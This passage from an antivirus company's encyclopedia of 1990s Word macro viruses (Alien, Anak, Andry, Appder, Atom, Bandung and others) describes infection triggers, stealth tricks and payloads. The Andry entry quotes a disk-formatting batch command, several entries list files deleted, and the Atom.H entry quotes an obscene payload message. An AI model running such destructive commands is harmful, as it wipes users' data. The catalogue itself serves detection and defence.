  16737. Again with a probability of 50 percent Alien displays the
  16738. following message:
  16739.  
  16740. "   It's Sunday & I intend to relax   "
  16741.  
  16742. Alien then tries to hide the "program manager" and terminate
  16743. Microsoft Word without saving the active document.
  16744.  
  16745. Alien also displays various messages:
  16746.  
  16747. "   You Fascinate Me.   "
  16748. "   Look No Furhter...   "
  16749. "   Hi Beautiful !  "
  16750. "   I'll Be Back !  "
  16751. "   Three Cheers For The Alien. Hip Hip Hooray !   "
  16752. "   Don't Believe the Hype !   "
  16753. "   Always Back Up Your Data.   "
  16754. "   Don't Believe All Tips !   "
  16755. "   Never Trust An Alien !   "
  16756. "   Never Open Other Files !   "
  16757. "   The 'Alien' Virus Has Arrived !   "
  16758. "   The Alien Lives...   "
  16759. "   Longer File Names Should Be Used.   "
  16760.  
  16761.  
  16762.  
  16763. [WORD_Alien.B]
  16764. Virus name: WORD_Alien.B
  16765. Virus Type: Word macro virus
  16766. Number of macros: 3
  16767. Encrypted: Yes
  16768. Macro names: AutoOpen, AutoClose, FileSaveAs
  16769. Size of macros: 7463 Bytes
  16770. Place of origin: United States
  16771. Date of origin: Spring 1997
  16772. Payload: Yes
  16773. Seen In-The-Wild: No
  16774. Description:
  16775.  
  16776. Alien.B infects the global template (normal.dot) when an
  16777. infected document is opened. Further documents become
  16778. infected when they are opened or closed.
  16779.  
  16780. The "ToolsCustomize" and "ToolsMacro" options are removed
  16781. by Alien.B to make recognition of an infected file more
  16782. difficult (called macro stealth technique).
  16783.  
  16784. The main difference between this new variant and the previous
  16785. Alien.A virus is that Alien.B contains some corrupted code.
  16786.  
  16787. For additional information, please refer to the Alien.A virus
  16788. description.
  16789.  
  16790.  
  16791. [WORD_Alien.C]
  16792. Virus name: WORD_Alien.C
  16793. Virus Type: Word macro virus
  16794. Number of macros: 3
  16795. Encrypted: Yes
  16796. Macro names: AutoOpen, AutoClose, FileSaveAs
  16797. Size of macros: 7463 Bytes
  16798. Place of origin: United States
  16799. Date of origin: Spring 1997
  16800. Payload: Yes
  16801. Seen In-The-Wild: No
  16802. Description:
  16803.  
  16804. Alien.C infects the global template (normal.dot) when an
  16805. infected document is opened. Further documents become
  16806. infected when they are opened or closed.
  16807.  
  16808. The "ToolsCustomize" and "ToolsMacro" options are removed
  16809. by Alien.C to make recognition of an infected file more
  16810. difficult (called macro stealth technique).
  16811.  
  16812. The main difference between this new variant and the previous
  16813. Alien.A virus is that Alien.C contains some modified codes.
  16814.  
  16815. For additional information, please refer to the Alien.A virus
  16816. description.
  16817.  
  16818.  
  16819. [WORD_Alien.D]
  16820. Virus name: WORD_Alien.D
  16821. Virus Type: Word macro virus
  16822. Number of macros: 3
  16823. Encrypted: Yes
  16824. Macro names: AutoOpen, AutoClose, FileSaveAs
  16825. Size of macros: 7463 Bytes
  16826. Place of origin: UK
  16827. Date of origin: Spring 1997
  16828. Payload: Yes
  16829. Seen In-The-Wild: No
  16830. Description:
  16831.  
  16832. Alien.D infects the global template (normal.dot) when an
  16833. infected document is opened. Further documents become
  16834. infected when they are also opened or closed.
  16835.  
  16836. The "ToolsCustomize" and "ToolsMacro" options are removed
  16837. by Alien.D to make recognition of an infected file more
  16838. difficult (called macro stealth technique).
  16839.  
  16840. The main difference between this new variant and the previous
  16841. Alien.B virus is that Alien.D contains a one byte corruption in
  16842. its AutoOpen macro.
  16843.  
  16844. For additional information, please refer to the Alien.A virus
  16845. description.
  16846.  
  16847.  
  16848. [WORD_Alien.E]
  16849. Virus name: WORD_Alien.E
  16850. Virus Type: Word macro virus
  16851. Number of macros: 3
  16852. Encrypted: Yes
  16853. Macro names: AutoOpen, AutoClose, FileSaveAs
  16854. Size of macros: 5061 Bytes
  16855. Place of origin: Unknown
  16856. Date of origin: Spring 1997
  16857. Payload: Yes
  16858. Seen In-The-Wild: No
  16859. Description:
  16860.  
  16861. Alien.E infects the global template (normal.dot) when an
  16862. infected document is opened. Further documents become
  16863. infected when they are also opened or closed.
  16864.  
  16865. The "ToolsCustomize" and "ToolsMacro" options are removed
  16866. by Alien.E to make recognition of an infected file more
  16867. difficult (called macro stealth technique).
  16868.  
  16869. The main difference between this new variant and previous
  16870. Alien viruses is that Alien.E contains some modified codes.
  16871.  
  16872. For additional information, please refer to the Alien.A virus
  16873. description.
  16874.  
  16875.  
  16876.  
  16877. [WORD_Alien.F]
  16878. Virus name: WORD_Alien.F
  16879. Virus Type: Word macro virus
  16880. Number of macros: 3
  16881. Encrypted: Yes
  16882. Macro names: AutoOpen, AutoClose, FileSaveAs
  16883. Size of macros: 8201 Bytes
  16884. Place of origin: United States
  16885. Date of origin: Spring 1997
  16886. Payload: Yes
  16887. Seen In-The-Wild: No
  16888. Description:
  16889.  
  16890. Alien.F infects the global template (normal.dot) when an infected
  16891. document is opened. Further documents become infected when
  16892. they are also opened or closed.
  16893.  
  16894. The "ToolsCustomize" and "ToolsMacro" options are removed
  16895. by Alien.F to make recognition of an infected file more
  16896. difficult (called macro stealth technique).
  16897.  
  16898. The main difference between this new variant and previous
  16899. Alien viruses is that Alien.F contains a corrupted "FileSaveAs"
  16900. macro.
  16901.  
  16902. For additional information, please refer to the Alien.A virus
  16903. description.
  16904.  
  16905.  
  16906. [WORD_Anak.A]
  16907. Virus name: WORD_Anak.A
  16908. Virus Type: Word macro virus
  16909. Number of macros: 5
  16910. Encrypted: Yes
  16911. Macro names: anakAE, AutoOpen,anakAO, anakSA, anakSMU,
  16912.                        (AutoExec, FileSave)
  16913. Size of macros: 5578 Bytes in documents
  16914.                 4737 Bytes in global template
  16915. Place of origin: Indonesia
  16916. Date of origin: March 1997
  16917. Payload: Yes
  16918. Seen In-The-Wild: No
  16919. Description:
  16920.  
  16921. Anak infects the global template (normal.dot) when an infected
  16922. document is opened. Further documents become infected when
  16923. they are saved (FileSave).
  16924.  
  16925. Anak removes ToolsMacro, FileTemplates, and ToolsCustomize
  16926. to make recognition of an infected document more difficult
  16927. (called macro stealth technique).
  16928.  
  16929. At the end of each month (starting on the 26th), Anak creates a
  16930. new file and inserts the following text into it:
  16931.  
  16932. "   ...i n t r o d u c i n g...anakSMU Semarang, March 1997   "
  16933.  
  16934. Anak also modifies the C:\AUTOEXEC.BAT file to add itself to
  16935. the system registry:
  16936.  
  16937. "   @ECHO OFF                                                      "
  16938. "   REM ---------------------------------------------------------  "
  16939. "   REM anakSMU wont destroy your REGEDIT, Just wanna be there :)  "
  16940. "   REM          email: anakSMU@TheOffice.net"                     "
  16941. "   REM ---------------------------------------------------------  "
  16942.  
  16943. The following message is displayed by Anak:
  16944.  
  16945. "   Yeah!, I wish I were anakSMU.   "
  16946.  
  16947.  
  16948.  
  16949. [WORD_Andry.A]
  16950. Virus name: WORD_Andry.A
  16951. Virus Type: Word macro virus
  16952. Number of macros: 1
  16953. Encrypted: Yes
  16954. Macro names: AutoOpen
  16955. Size of macros: 6896 Bytes
  16956. Place of origin: Indonesia
  16957. Date of origin: Spring 1997
  16958. Destructive: Yes
  16959. Seen In-The-Wild: No
  16960. Description:
  16961.  
  16962. Andry.A infects the global template (normal.dot) when an
  16963. infected document is opened. Further documents become
  16964. infected when they are also opened (AutoOpen).
  16965.  
  16966. Andry hides FileTemplate, FormatStyle, ToolsCustomize,
  16967. ToolsMacro, and ViewToolbars to make recognition of an
  16968. infected document more difficult (called macro stealth
  16969. technique).  We advise not to use those menu items, since
  16970. Andry attaches its viral macro to those commands.
  16971.  
  16972. On March 1st, Andry encrypts infected documents with the following
  16973. password:
  16974.  
  16975. "   Andry Christian   "
  16976.  
  16977. If you find a document with an unknown password, please
  16978. download a copy of WinWord Password Recovery Tool
  16979. (wwprt). It is available at: www.vdsarg.com.
  16980.  
  16981. When a document is opened and the second field shows 1 or 3,
  16982. Andry replaces all text with the following:
  16983.  
  16984. "   Hello...Andry Christian WordMacro Virus is Here...."
  16985.  
  16986. Also on March 1st, Andry displays the following message and
  16987. asks for user input:
  16988.  
  16989. "   HACKERS Labs '96 - Hackware Technology Research   "
  16990. "   ANDRY [CHRISTIAN] WORD MACRO VIRUS IS HERE !!!   "
  16991. "   DO YOU SUPPORT MY VIRUS ?   "
  16992.  
  16993. In case of a Yes, nothing happens.
  16994.  
  16995. In case of a No, Andry overwrites the AUTOEXEC.BAT file
  16996. and tries to format the hard disk.
  16997.  
  16998. "   @ECHO OFF   "
  16999. "   CLS   "
  17000. "   ECHO Please wait . . .   "
  17001. "   FORMAT C: /U /C /S /AUTOTEST > NUL   "
  17002.  
  17003. The following comment can also be found in the virus code:
  17004.  
  17005. "====================================================================="
  17006. "  Source Code of Andry Christian WordMacro Virus 0.99 - _eta Release "
  17007. "====================================================================="
  17008. "   Virographer by Andry [Christian] in [Batavia] City, of INDONESIA  "
  17009. " Viroright (C) 1996-1999 Hackware Technology Research - HACKERS Labs."
  17010. "  Multi Platform, Multi Infector, Stealth, OneMacro, Encryption, etc "
  17011. "   Last Update by 01-Maret-1996 & 01:03 PM - Found Bugs...? Call Me  "
  17012. "====================================================================="
  17013. "   HACKERS Labs. -> WE ARE A BIG FAMILY OF THE VIRUS CREATOR's TEAM  "
  17014. "====================================================================="
  17015.  
  17016.  
  17017. [WORD_Appder.A]
  17018. Virus name: WORD_Appder.A (a.k.a.FunYour)
  17019. Virus Type: Word macro virus
  17020. Alias: WORD_NTTHNTA
  17021. Number of Variants: 10
  17022. Number of macros: 2 or 3
  17023. Encrypted: No
  17024. Macro names: Appder, AutoOpen, AutoClose
  17025. Size of macros: 1912 Bytes in .doc files
  17026.                 1126 Bytes in global template
  17027. Place of origin: Unknown
  17028. Date of origin: Unknown
  17029. Destructive: Yes
  17030. Seen In-The-Wild: No
  17031. Description:
  17032.  
  17033. Appder infects the global template (normal.dot) when an
  17034. infected document is opened. Further documents become
  17035. infected when they are closed.
  17036.  
  17037. Appder adds a "NTTHNTA=xx" value to the [Microsoft Word] section of
  17038. winword6.ini and increases the value by one when infecting documents.
  17039. Upon reaching a value of 20, Appder triggers its destructive payload
  17040. and deletes the following files:
  17041.  
  17042. C:\DOC\*.exe
  17043. C:\DOC\*.com
  17044. C:\WINDOWS\*.exe
  17045. C:\WINDOWS\SYSTEM\*.TTF
  17046. C:\WINDOWS\SYSTEM\*.FOT
  17047.  
  17048. As a result, Windows will not work properly.
  17049.  
  17050.  
  17051. [WORD8_Appder]
  17052. Virus name: WORD8_Appder
  17053. Virus Type: Word macro virus
  17054. Alias: WORD_NTTHNTA
  17055. Number of Variants: 10
  17056. Platform: Office 97
  17057. Number of macros: 2 or 3
  17058. Encrypted: No
  17059. Macro names: Appder, AutoOpen, AutoClose
  17060. Size of macros: 1912 Bytes in .doc files
  17061.                 1126 Bytes in global template
  17062. Place of origin: Unknown
  17063. Date of origin: Unknown
  17064. Destructive: Yes
  17065. Seen In-The-Wild: No
  17066. Description:
  17067.  
  17068. Appder infects the global template (normal.dot) when an
  17069. infected document is opened. Further documents become
  17070. infected when they are closed.
  17071.  
  17072. Appder adds a "NTTHNTA=xx" value to the [Microsoft Word] section of
  17073. winword6.ini and increases the value by one when infecting documents.
  17074. Upon reaching a value of 20, Appder triggers its destructive payload
  17075. and deletes the following files:
  17076.  
  17077. C:\DOC\*.exe
  17078. C:\DOC\*.com
  17079. C:\WINDOWS\*.exe
  17080. C:\WINDOWS\SYSTEM\*.TTF
  17081. C:\WINDOWS\SYSTEM\*.FOT
  17082.  
  17083. As a result, Windows will not work properly.
  17084.  
  17085.  
  17086.  
  17087. [WORD_NTTHNTA]
  17088. Virus name: WORD_NTTHNTA
  17089. Virus Type: Word macro virus
  17090. Alias: WORD_Appder.A
  17091. Number of Variants: 10
  17092. Number of macros: 2 or 3
  17093. Encrypted: No
  17094. Macro names: Appder, AutoOpen, AutoClose
  17095. Size of macros: 1912 Bytes in .doc files
  17096.                 1126 Bytes in global template
  17097. Place of origin: Unknown
  17098. Date of origin: Unknown
  17099. Destructive: Yes
  17100. Seen In-The-Wild: No
  17101. Description:
  17102.  
  17103. NTTHNTA infects the global template (normal.dot) when an
  17104. infected document is opened. Further documents become
  17105. infected when they are closed.
  17106.  
  17107. NTTHNTA adds an "NTTHNTA=xx" value to the [Microsoft Word] section of
  17108. winword6.ini and increases the value by one when infecting documents.
  17109. Upon reaching a value of 20, NTTHNTA triggers its destructive payload
  17110. and deletes the following files:
  17111.  
  17112. C:\DOC\*.exe
  17113. C:\DOC\*.com
  17114. C:\WINDOWS\*.exe
  17115. C:\WINDOWS\SYSTEM\*.TTF
  17116. C:\WINDOWS\SYSTEM\*.FOT
  17117.  
  17118. As a result, Windows 3.x will not work properly.
  17119.  
  17120.  
  17121. [WORD_Appder.B (a.k.a.FunYour)]
  17122. Virus name: WORD_Appder.B (a.k.a.FunYour)
  17123. Virus Type: Word macro virus
  17124. Number of macros: 2 or 3
  17125. Encrypted: No
  17126. Macro names: Appder, AutoOpen, AutoClose
  17127. Size of macros: 1528 Bytes in documents
  17128.                 934 Bytes in global template
  17129. Place of origin: Unknown
  17130. Date of origin: Unknown
  17131. Destructive: No
  17132. Seen In-The-Wild: Yes
  17133. Description:
  17134.  
  17135. The difference between this new variant and the original
  17136. Appder.A virus is that the payload has been deleted from the
  17137. macro code.  Therefore Appder.B does not delete any files.
  17138.  
  17139. Appder.B infects the global template (normal.dot) when an
  17140. infected document is opened.  Further documents become
  17141. infected when they are closed (AutoClose).
  17142.  
  17143.  
  17144. [WORD_Appder.C (a.k.a.FunYour)]
  17145. Virus name: WORD_Appder.C (a.k.a.FunYour)
  17146. Virus Type: Word macro virus
  17147. Number of macros: 2 or 3
  17148. Encrypted: No
  17149. Macro names: Appder, AutoOpen, AutoClose
  17150. Size of macros: 1912 Bytes in .doc files
  17151.                 1126 Bytes in global template
  17152. Place of origin: Unknown
  17153. Date of origin: Unknown
  17154. Destructive: Yes
  17155. Seen In-The-Wild: No
  17156. Description:
  17157.  
  17158. The difference between this new variant and the original
  17159. Appder.A virus is that Appder.C has a one byte code modification.
  17160.  
  17161. Appder.C infects the global template (normal.dot) when an
  17162. infected document is opened. Further documents become
  17163. infected when they are closed (AutoClose).
  17164.  
  17165. Appder.C adds a "NTTHNTA=xx" value to the [Microsoft Word] section
  17166. of winword6.ini and increases the value by one when infecting documents.
  17167. Upon reaching a value of 20, Appder.C triggers its destructive payload
  17168. and deletes the following files:
  17169.  
  17170. C:\DOC\*.exe
  17171. C:\DOC\*.com
  17172. C:\WINDOWS\*.exe
  17173. C:\WINDOWS\SYSTEM\*.TTF
  17174. C:\WINDOWS\SYSTEM\*.FOT
  17175.  
  17176. As a result, Windows 3.x does not work properly.
  17177.  
  17178.  
  17179. [WORD_Atom.A (a.k.a Atomic)]
  17180. Virus name: WORD_Atom.A (a.k.a. Atomic)
  17181. Virus Type: Word macro virus
  17182. Number of macros: 4
  17183. Encrypted: Yes
  17184. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17185. Size of macros: 1029 Bytes
  17186. Place of origin: Ukraine
  17187. Date of origin: February 1996
  17188. Destructive: Yes
  17189. Common In-The-Wild: Yes
  17190. Description:
  17191.  
  17192. Atom infects the global template (Normal.dot) once an infected
  17193. document is opened. Further documents become infected when
  17194. a document is opened (FileOpen) or saved (FileSaveAs).
  17195.  
  17196. When the "FileSaveAs" macro is called, Atom checks the
  17197. system clock for a value of 13 in the seconds field. If this is the
  17198. case, Atom adds the password "ATOM#1" to the saved document.
  17199.  
  17200. The destructive payload inside "Atom" is activated on the
  17201. 13th of each month. On this day, Atom deletes all the files
  17202. inside the current directory.
  17203.  
  17204.  
  17205. [WORD_Atom.B]
  17206. Virus name: WORD_Atom.B
  17207. Virus Type: Word macro virus
  17208. Number of macros: 4
  17209. Encrypted: Yes
  17210. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17211. Size of macros: 1053 Bytes
  17212. Place of origin: Unknown
  17213. Date of origin: December 1996
  17214. Destructive: Yes
  17215. Common In-The-Wild: No
  17216. Description:
  17217.  
  17218. The difference between this new variant and the original
  17219. Atom.A virus is only minor. It does not affect the
  17220. functionality of this new variant.
  17221.  
  17222. For more information, please refer to the Atom.A virus description.
  17223.  
  17224.  
  17225. [WORD_Atom.C]
  17226. Virus name: WORD_Atom.C
  17227. Virus Type: Word macro virus
  17228. Number of macros: 4
  17229. Encrypted: Yes
  17230. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17231. Size of macros: 1026 Bytes
  17232. Place of origin: Unknown
  17233. Date of origin: December 1996
  17234. Destructive: Yes
  17235. Common In-The-Wild: No
  17236. Description:
  17237.  
  17238. The difference between this new variant and the original
  17239. Atom.A virus is only minor. It does not affect the
  17240. functionality of this new variant.
  17241.  
  17242. For more information, please refer to the Atom.A virus description.
  17243.  
  17244.  
  17245. [WORD_Atom.D]
  17246. Virus name: WORD_Atom.D
  17247. Virus Type: Word macro virus
  17248. Number of macros: 4
  17249. Encrypted: Yes
  17250. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17251. Size of macros: 1024 Bytes
  17252. Place of origin: Unknown
  17253. Date of origin: December 1996
  17254. Destructive: Yes
  17255. Common In-The-Wild: No
  17256. Description:
  17257.  
  17258. The difference between this new variant and the original
  17259. Atom.A virus is only minor. It does not affect the
  17260. functionality of this new variant.
  17261.  
  17262. For more information, please refer to the Atom.A virus description.
  17263.  
  17264.  
  17265. [WORD_Atom.E]
  17266. Virus name: WORD_Atom.E
  17267. Virus Type: Word macro virus
  17268. Number of macros: 4
  17269. Encrypted: Yes
  17270. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17271. Size of macros: 1017 Bytes
  17272. Place of origin: Unknown
  17273. Date of origin: December 1996
  17274. Destructive: Yes
  17275. Common In-The-Wild: No
  17276. Description:
  17277.  
  17278. The difference between this new variant and the original
  17279. Atom.A virus is only minor. It does not affect the
  17280. functionality of this new variant.
  17281.  
  17282. The programming error in Atom.A, which activates the
  17283. payload on the 13th of each month, has been fixed in this new
  17284. variant. Atom.E activates only on the 13th of December.
  17285.  
  17286. For more information, please refer to the Atom.A virus description.
  17287.  
  17288.  
  17289. [WORD_Atom.F]
  17290. Virus name: WORD_Atom.F
  17291. Virus Type: Word macro virus
  17292. Number of macros: 4
  17293. Encrypted: Yes
  17294. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17295. Size of macros: 1022 Bytes
  17296. Place of origin: Unknown
  17297. Date of origin: December 1996
  17298. Destructive: Yes
  17299. Common In-The-Wild: No
  17300. Description:
  17301.  
  17302. The difference between this new variant and the original
  17303. Atom.A virus is only minor. It does not affect the
  17304. functionality of this new variant.
  17305.  
  17306. For more information, please refer to the Atom.A virus description.
  17307.  
  17308.  
  17309. [WORD_Atom.G:De (a.k.a Atomic)]
  17310. Virus name: WORD_Atom.G:De (a.k.a. Atomic)
  17311. Virus Type: Word macro virus
  17312. Number of macros: 4
  17313. Encrypted: Yes
  17314. Macro names: Atom, AutoOpen, DateiOeffnen, DateiSpeichernUnter
  17315. Size of macros: 1120 Bytes
  17316. Place of origin: Germany
  17317. Date of origin: February 1996
  17318. Destructive: Yes
  17319. Common In-The-Wild: No
  17320. Description:
  17321.  
  17322. Atom.G infects the global template (Normal.dot) once an
  17323. infected document is opened. Further documents become
  17324. infected when a document is opened (DateiOeffnen) or saved
  17325. (DateiSpeichernUnter).
  17326.  
  17327. When the "DateiSpeichernUnter" macro is called, Atom.G
  17328. checks the system clock for a value of 13 in the seconds field.
  17329. If this is the case, Atom.G adds the password "ATOM#1" to
  17330. the saved document.
  17331.  
  17332. The destructive payload inside "Atom" is activated on the
  17333. 13th of December. On this day, Atom.G deletes all the files
  17334. inside the current directory.
  17335.  
  17336. Atom.G only works with the German version of Microsoft
  17337. Word, since it uses language specific macros.
  17338.  
  17339.  
  17340. [WORD_Atom.H (a.k.a Adultsex)]
  17341. Virus name: WORD_Atom.H (a.k.a. Adultsex)
  17342. Virus Type: Word macro virus
  17343. Number of macros: 4
  17344. Encrypted: Yes
  17345. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  17346. Size of macros: 1302 Bytes
  17347. Place of origin: Unknown
  17348. Date of origin: February 1996
  17349. Destructive: Yes
  17350. Common In-The-Wild: No
  17351. Description:
  17352.  
  17353. The difference between this new variant and the original
  17354. Atom.A virus is that the payload has been changed in this
  17355. new variant.
  17356.  
  17357. Instead of deleting files, Atom.H displays the following
  17358. message when opening documents:
  17359.  
  17360.         "KISS ME FUCK ME LOVE ME BITCH SUCK MY DICK ADULT SEX  !!
  17361.         I LOVE SEX DRUGS CLASS A DRUGS YEAH MAN !
  17362.         I ASK YOU MY DARLING FOR ANAL SEX GIVE IT TO ME !
  17363.         EVER DANCED WITH THE DEVIL ON THE MOONLIGHT ?
  17364.         PREY FOR YOUR CUNT YOU SEXY HORNEY BITCH"
  17365.  
  17366. The password, which is added to a saved document, was also
  17367. changed from "ATOM#1" to "ADULTSEX#1."
  17368.  
  17369. For more information, please refer to the Atom.A virus description.
  17370.  
  17371.  
  17372. [WORD_Attack.A]
  17373. Virus name: WORD_Attack.A
  17374. Virus Type: Word macro virus
  17375. Number of macros: 8
  17376. Encrypted: Yes
  17377. Macro names: AutoOpen, Active, Attack, FileOpen, FileSaveAs,
  17378.              InActive, Organizer, ToolsMacro
  17379. Size of macros: 8201 Bytes
  17380. Place of origin: UK
  17381. Date of origin: Spring 1997
  17382. Payload: Yes
  17383. Seen In-The-Wild: No
  17384. Description:
  17385.  
  17386. Attack.A infects the global template (normal.dot) when an
  17387. infected document is opened. Further documents become
  17388. infected when they are also opened (FileOpen) or saved
  17389. (FileSaveAs).
  17390.  
  17391. Attack uses ToolsMacro to make recognition of an infected
  17392. document more difficult (called macro stealth technique).
  17393.  
  17394. Attack has various payloads:
  17395.  
  17396. 1. It deletes files.
  17397. 2. It changes file attributes to hidden.
  17398. 3. It replaces text with the following:
  17399.  
  17400. "   This is Microsoft Bang!**Virus**---   "
  17401.  
  17402. 4. It sets the following password to saved documents:
  17403.  
  17404. "   Virii   "
  17405.  
  17406. If you find a document with an unknown password, please
  17407. download a copy of the WinWord Password Recovery Tool (wwprt).
  17408. It is available at: www.vdsarg.com.
  17409.  
  17410.  
  17411. [WORD_Badboy.A]
  17412. Virus name: WORD_Badboy.A
  17413. Virus Type: Word macro virus
  17414. Number of macros: 5
  17415. Encrypted: Yes
  17416. Macro names: BadBoy, FileNew, AutoExec, AutoOpen, FileSaveAs
  17417. Size of macros: 1873 Bytes
  17418. Place of origin: Unknown
  17419. Date of origin: Unknown
  17420. Payload: Yes
  17421. Seen In-The-Wild: No
  17422. Description:
  17423.  
  17424. Badboy infects the global template (normal.dot) when an
  17425. infected document is opened.  Further documents become
  17426. infected when they are saved with the "FileSaveAs" command.
  17427.  
  17428. When an infected file is opened on the 1st and 13th of each
  17429. month (normal.dot is already infected), Badboy displays the
  17430. following message and then sets the "   gangsta   " password
  17431. to the active document:
  17432.  
  17433. "   Bad Boy BadBoy, What u gonna do "
  17434. "   What u gonna do when they come for you   "
  17435. "   The Gangsta owns you !   "
  17436. "   Have a happy new year !   "
  17437.  
  17438. Badboy also changes the File Summary info to the following:
  17439.  
  17440. "   Author = Kenny-G sux   "
  17441. "   Keywords = Gangsta Rappa   "
  17442. "   Comments = The Mutha mix   "
  17443.  
  17444. To make recognition of an infected file more difficult Badboy
  17445. removes the Tools/Macro, Tools/Customize and File/Templates
  17446. menus (called macro stealth technique).
  17447.  
  17448.  
  17449. [WORD_Bandung.A (a.k.a. Jakarta)]
  17450. Virus name: WORD_Bandung.A (a.k.a. Jakarta)
  17451. Virus Type: Word macro virus
  17452. Number of macros: 6
  17453. Encrypted: No
  17454. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs
  17455.              Toolsmacro, Toolscustomize
  17456. Size of macros: 4262 Bytes
  17457. Place of origin: Bandung, Indonesia
  17458. Date of origin: August/September 1996
  17459. Destructive: Yes
  17460. Seen In-The-Wild: Yes
  17461. Description:
  17462.  
  17463. Bandung infects the global template (Normal.dot) when an
  17464. infected document is opened. Further documents are infected
  17465. with the "FileSave" and "FileSaveAs" commands.
  17466.  
  17467. Bandung uses macro stealth techniques to hide itself. It uses
  17468. "ToolsMacro" to make recognition of an infected document
  17469. more difficult (called macro stealth technique).
  17470.  
  17471. The destructive payload activates when Microsoft Word is
  17472. started.  It checks the date and time and in case of a date later
  17473. than the 19th of each month and a time after 11:00 am, Bandung
  17474. deletes all files in all directories.
  17475. An exception to this are the files located in the following
  17476. directories:
  17477.  
  17478. C:\WINDOWS
  17479. C:\WINWORD
  17480. C:\WINWORD6
  17481.  
  17482. After the file deletion, Bandung creates the file
  17483. C:\PESAN.TXT.
  17484.  
  17485. The file contains some Indonesian text telling the user
  17486. (translated to English):
  17487.  
  17488. "   You are unlucky, all files on this machine have been deleted,   "
  17489. "   except for WINDOWS and WINWORD, don't panic, this is  "
  17490. "   not your fault, but this the result of my work......Whoever  "
  17491. "   is able to find a way to combat this virus, I will give the   "
  17492. "   virus listing to you!!!! And of course I will constantly  "
  17493. "   return to greet you with my new viruses .....good luck !  "
  17494. "   Bandung Monday, June 28 1996, 13:00 pm   "
  17495.  
  17496. Another payload replaces the letter "a" with "#@." This occurs
  17497. when the "ToolsCustomize" macro is called.
  17498.  
  17499. Bandung also displays some WordBasic error messages.
  17500.  
  17501.  
  17502. [WORD_Bandung.B]
  17503. Virus name: WORD_Bandung.B
  17504. Virus Type: Word macro virus
  17505. Number of macros: 6
  17506. Encrypted: No
  17507. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs
  17508.              Toolsmacro, Toolscustomize
  17509. Size of macros: 4262 Bytes
  17510. Place of origin: Bandung, Indonesia
  17511. Date of origin: August/September 1996
  17512. Destructive: No
  17513. Seen In-The-Wild: No
  17514. Description:
  17515.  
  17516. The difference between this new variant and the original
  17517. Bandung.A virus is that the AutoExec, ToolsMacro and
  17518. ToolsCustomize macros are corrupted.
  17519.  
  17520. Due to the corruption, Bandung.B does not activate its
  17521. destructive payload. Instead of the payload activation, it
  17522. displays various error messages.  Bandung.B is still able to
  17523. infect the global template and further documents.
  17524.  
  17525. Bandung uses "Toolsmacro" to make recognition of an
  17526. infected file more difficult (called macro stealth technique).
  17527.  
  17528.  
  17529. [WORD_Bandung.C]
  17530. Virus name: WORD_Bandung.C
  17531. Virus Type: Word macro virus
  17532. Number of macros: 6
  17533. Encrypted: No
  17534. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
  17535.              Toolsmacro, Toolscustomize
  17536. Size of macros: 5428 Bytes
  17537. Place of origin: Bandung, Indonesia
  17538. Date of origin: December 1996
  17539. Payload: Yes
  17540. Common In-The-Wild: No
  17541. Description:
  17542.  
  17543. The difference between this new variant and the original
  17544. Bandung.A virus is that the "AutoExec" macro was replaced
  17545. with the corrupted "AutoOpen" macro from the Rapi virus.
  17546.  
  17547. The payload replaces the letter "a" with "#@." This occurs
  17548. when the "ToolsCustomize" macro is called.
  17549.  
  17550. Bandung.C uses "ToolsMacro" to make recognition of an
  17551. infected document more difficult (called macro stealth
  17552. technique).
  17553.  
  17554. Due to the new macro code, Bandung.C displays a syntax
  17555. error message whenever Microsoft Word is started.
  17556.  
  17557.  
  17558.  
  17559. [WORD_Bandung.D]
  17560. Virus name: WORD_Bandung.D
  17561. Virus Type: Word macro virus
  17562. Number of macros: 6
  17563. Encrypted: No
  17564. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
  17565.              Toolsmacro, Toolscustomize
  17566. Size of macros: 4262 Bytes
  17567. Place of origin: Bandung, Indonesia
  17568. Date of origin: December 1996
  17569. Destructive: Yes
  17570. Common In-The-Wild: No
  17571. Description:
  17572.  
  17573. The difference between this new variant and the original
  17574. Bandung.A virus is that the "AutoExec" macro is corrupted.
  17575. Even though there is a corruption in the "AutoExec" macro,
  17576. Bandung.D still activates its destructive payload when
  17577. Microsoft Word is started.
  17578.  
  17579. Another payload replaces the letter "a" with "#@." This occurs
  17580. when the "ToolsCustomize" macro is called.
  17581.  
  17582. Bandung.D uses macro stealth technique to hide itself. It uses
  17583. "ToolsMacro" to make recognition of an infected document
  17584. more difficult (called macro stealth technique).
  17585.  
  17586. Due to its macro corruption, Bandung.D displays some error
  17587. messages.
  17588.  
  17589. For more information, please refer to the Bandung.A virus description.
  17590.  
  17591.  
  17592.  
  17593. [WORD_Bandung.E]
  17594. Virus name: WORD_Bandung.E
  17595. Virus Type: Word macro virus
  17596. Number of macros: 6
  17597. Encrypted: No
  17598. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
  17599.              Toolsmacro, Toolscustomize
  17600. Size of macros: 4262 Bytes
  17601. Place of origin: Bandung, Indonesia
  17602. Date of origin: January 1997
  17603. Payload: Yes
  17604. Common In-The-Wild: No
  17605. Description:
  17606.  
  17607. The difference between this new variant and the original
  17608. Bandung.A virus is that the "AutoExec" macro is corrupted.
  17609.  
  17610. The payload replaces the letter "a" with "#@." This occurs
  17611. when the "ToolsCustomize" macro is called.
  17612.  
  17613. Bandung.E uses "ToolsMacro" to make recognition of an
  17614. infected document more difficult (called macro stealth technique).
  17615.  
  17616. Due to its macro corruption, Bandung.E never executes its
  17617. destructive payload. Instead it displays the following
  17618. Wordbasic error message:
  17619.  
  17620. "   Out of Memory   "
  17621.  
  17622.  
  17623. [WORD_Bandung.G]
  17624. Virus name: WORD_Bandung.G
  17625. Virus Type: Word macro virus
  17626. Number of macros: 6
  17627. Encrypted: No
  17628. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
  17629.              ToolsMacro, ToolsCustomize
  17630. Size of macros: 1990 Bytes
  17631. Place of origin: Bandung, Indonesia
  17632. Date of origin: January 1997
  17633. Payload: Yes
  17634. Seen In-The-Wild: No
  17635. Description:
  17636.  
  17637. The only difference between this new variant and the original
